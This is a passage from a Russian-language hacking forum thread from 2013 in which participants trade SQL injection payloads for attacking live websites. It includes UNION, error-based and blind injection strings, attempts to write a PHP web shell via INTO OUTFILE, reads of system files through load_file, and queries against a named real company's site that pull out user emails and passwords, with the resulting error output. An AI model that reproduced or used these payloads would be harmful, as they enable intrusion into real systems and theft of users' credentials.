ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.05.2013, 20:19
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
а нафиг тебе нужен этот file_priv , пробуй сразу заливать шелленг и все
|
|
|
16.05.2013, 20:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Evil_Genius
Evil_Genius said:
попробовал load_file и так и сяк и в хэксе - не показыват ничего и ошибок нету
Через софт вот таким запросом выводит содержимое таблицы
site.ru/ask.php?page=ask&cid=999999.9+union+all+select+(se lect+concat(0x7e,0x27,unhex(Hex(cast(cms_config.co nfig_name+as+char))),0x27,0x7e)+from+`site_db`.cms _config+limit+0,1)+,0x31303235343830303536,0x31303 235343830303536,0x31303235343830303536,0x313032353 43830303536,0x31303235343830303536--
Както выводит содержимое нормально...Но как вывести этот file_priv то?
файл прив так
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]site[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ask[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]ask[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]cid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]union[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]File_Priv[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]from[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]mysql[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]limit[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][/COLOR]
и так далее перебираешь лимит пока не переберёшь всех юзеров, хотя не понимаю нафиг оно тебе нужно.
если ковычки не фильтруются то спокойно можно лить шелл, а и на будушие, черз лоад файл если ничего не выводится и нет ошибки это потому что содержимое файла сильно большое,
его нужно по кускам выводить
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]site[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ask[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]ask[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]cid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]union[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]load_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'какойто файл'[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]99[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][/COLOR]
и так дальше перебераешь
|
|
|
|
16.05.2013, 22:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
2037
Репутация:
0
|
|
Всем привет! подскажите кто знает как правильно составить запрос чтоб работал оператор LIKE в запросе
я хочу чтоб запрос вывел мне таблицу в которой есть интересующие меня колонки например email pass и т.д
как получить структуру, колонки и содержимое таблиц я знаю
но вот с LIKE у меня не получается не могу понять почему
чтобы было понятнее я хочу рассмотреть на примере
Код HTML:
HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD='
есть инъекция
Код HTML:
HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=1%27)%20or%201%3D(select%20top%201%20%2Bcast(us erid%20as%20nvarchar)%2Bchar(0x7e)%2Bcast(email%20 as%20nvarchar)%2Bchar(0x7e)%2Bcast(userpassword%20 as%20nvarchar)%20from%20Piaggio..tbSSORegistration %20where%20userid%3E1)--
Conversion failed when converting the nvarchar value '1370~industrialcars@dealer.piaggio.~???.......... ............' to data type int.
в базе Piaggio есть таблица tbSSORegistration и есть колонки email и userpassword
пробую через LIKE вывести имя таблицы в которой есть колонка emai
Код HTML:
HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT sysobjects.name as tablename,syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE 'email' )--
выводит
Only one expression can be specified in the select list when the subquery is not introduced with EXISTS.
пробовал указать базу
Код HTML:
HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT Piaggio..sysobjects.name as tablename,Piaggio..syscolumns.name as columnname FROM Piaggio..sysobjects JOIN Piaggio..syscolumns ON Piaggio..sysobjects.id = Piaggio..syscolumns.id WHERE sysobjects.xtype = 'U' AND Piaggio..syscolumns.name LIKE 'email' )--
пробовал и так
Код HTML:
HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=')%20or%201=(select%20top%201%20table_name%20fr om%20information_schema.tables%20where%20table_nam e%20like%20'%25email%25')--
подскажите плз кто знает как правильно запрос составить с LIKE |
|
|
|
17.05.2013, 01:28
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме:
189651
Репутация:
-5
|
|
Сообщение от Gorev
Gorev said:
а нафиг тебе нужен этот file_priv , пробуй сразу заливать шелленг и все
Файл Прив нужен хотя бы чтобы узнать стоит ли возиться с данным сайтом или нафиг выбросить.
Попробовал напрямую залиться, но всё пусто((
site.ru/ask.php?page=ask&cid=2+union+select+1,``,3,4,5,6+f rom+mysql.user+into+outfile+`/home/site/subdomains/t44/www/images/1.php`
Кавычки использовал прямые ' и косые ` и так и этак выдает ошибку:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/site/public_html/ask.php on line 203
Сообщение от qaz
qaz said:
файл прив так
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]site[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ask[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]ask[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]cid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]union[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]File_Priv[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]from[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]mysql[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]limit[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][/COLOR]
и так далее перебираешь лимит пока не переберёшь всех юзеров, хотя не понимаю нафиг оно тебе нужно.
если ковычки не фильтруются то спокойно можно лить шелл, а и на будушие, черз лоад файл если ничего не выводится и нет ошибки это потому что содержимое файла сильно большое,
его нужно по кускам выводить
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]site[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ask[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]ask[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]cid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]union[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]load_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'какойто файл'[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]99[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][/COLOR]
и так дальше перебераешь Перебор лимитом тоже не помогает при выводе файл прив.
Лоад файл тоже не помогает как ты указал, выдает ошибки:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/site/public_html/ask.php on line 203
|
|
|
|
17.05.2013, 20:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
32490
Репутация:
4
|
|
Помогите, пожалуйста, пока мозг не взорвался)
Уязвимость - error based в POST запросе, но параметра такого вида: cell_coordinates=1_11, два числа, разделенных нижним подчеркиванием, координаты.
И имя базы, и версия выводятся нормально:
запрос:
Сообщение от None
cell_coordinates=1_11 OR 1 GROUP BY CONCAT(concat(0x27,version()),FLOOR(RAND(0)*2)) HAVING MIN(0)-- and 1=1&value_id=2&comment_add=&save=
ответ:
Сообщение от None
Duplicate entry ''5.0.95-log1' for key 1:
Но, как только идет запрос с "_", сразу вываливается синтаксическая ошибка, видимо поэтому с information_schema не получается вытащить имена таблиц, перебором нашел единственную таблицу items, ее данные вытаскиваются хорошо, но сайт на dle и все остальные таблицы с префиксом, и их даже перебором не подобрать:
подбор без префикса
Сообщение от None
cell_coordinates=1_11 OR 1 GROUP BY CONCAT((select concat(0x7233646D3076335F73716C5F696E6A656374696F6 E,count(*)) from u47424.users),FLOOR(RAND(0)*2)) HAVING MIN(0)-- and 1=1&value_id=2&comment_add=&save=
ответ:
Сообщение от None
Table 'u47424.users' doesn't exist
с префиксом:
Сообщение от None
cell_coordinates=1_11 OR 1 GROUP BY CONCAT((select concat(0x7233646D3076335F73716C5F696E6A656374696F6 E,count(*)) from u47424.dle_users),FLOOR(RAND(0)*2)) HAVING MIN(0)-- and 1=1&value_id=2&comment_add=&save=
ответ:
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND y_id = 1 AND map_id = 53 LIMIT 0,1' at line 1
Видимо параметр разделяется на два по нижнему подчеркиванию "_", и при наличии его в инъекции все идет хз как, как от него можно избавиться? Несколько страниц назад была такая же проблема, там советовали менять _ на %255f или %5f, не помогает |
|
|
|
17.05.2013, 20:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
193811
Репутация:
724
|
|
dpash, попробуйте в качестве альтернативы подчеркивания использовать CHAR(тут код символа)
|
|
|
|
17.05.2013, 21:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
32490
Репутация:
4
|
|
Сообщение от VY_CMa
VY_CMa said:
dpash
, попробуйте в качестве альтернативы подчеркивания использовать CHAR(тут код символа)
вот так?
Сообщение от None
cell_coordinates=1_11 OR 1 GROUP BY CONCAT((select concat(0x7233646D3076335F73716C5F696E6A656374696F6 E,count(*)) from u47424.dleCHAR(95)users),FLOOR(RAND(0)*2)) HAVING MIN(0)-- and 1=1&value_id=2&comment_add=&save=
опять ошибка:
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(95)users),FLOOR(RAND(0)*2)) HAVING MIN(0)-- and 1=1 AND y_id = 1 AND map_id = 5' at line 1
Если что, извиняюсь за нубство(
|
|
|
|
17.05.2013, 21:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
Добрый вечер.
нашел слепую скулю, раньше с ними не встречался... хавиж ее перебирает как-то так -
Сообщение от None
and+ascii%28substring%28%28select+users.login+from +troop.users+Order+by+login+limit+17%2C1%29%2C3%2C 1%29%29%3d34
Начал он переберать с спецсимволов, а база логинов там на пару тысяч + жует кирилицу, выдает вместо нее ???.
Ник админа заранее известен. Как вытащить его данные? |
|
|
|
17.05.2013, 21:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
32490
Репутация:
4
|
|
Сообщение от justonline
justonline said:
Начал он переберать с спецсимволов, а база логинов там на пару тысяч + жует кирилицу, выдает вместо нее ???.
Попробуй sqlmap, он намного лучше работает с кириллицей и вообще с кодировками, если лень - кинь в ЛС где и что, попробую помочь, хоть отвлекусь от своей "уязвимости" немного)
|
|
|
|
17.05.2013, 21:58
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от justonline
justonline said:
Добрый вечер.
нашел слепую скулю, раньше с ними не встречался... хавиж ее перебирает как-то так -
Начал он переберать с спецсимволов, а база логинов там на пару тысяч + жует кирилицу, выдает вместо нее ???.
Ник админа заранее известен. Как вытащить его данные?
Примерно так:
Сообщение от None
and (SUBSTRING((SELECT users.login+
from+troop.users+where+login=0x[нужный логин в хексе]+limit+0,1
),1,1))>char(50)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
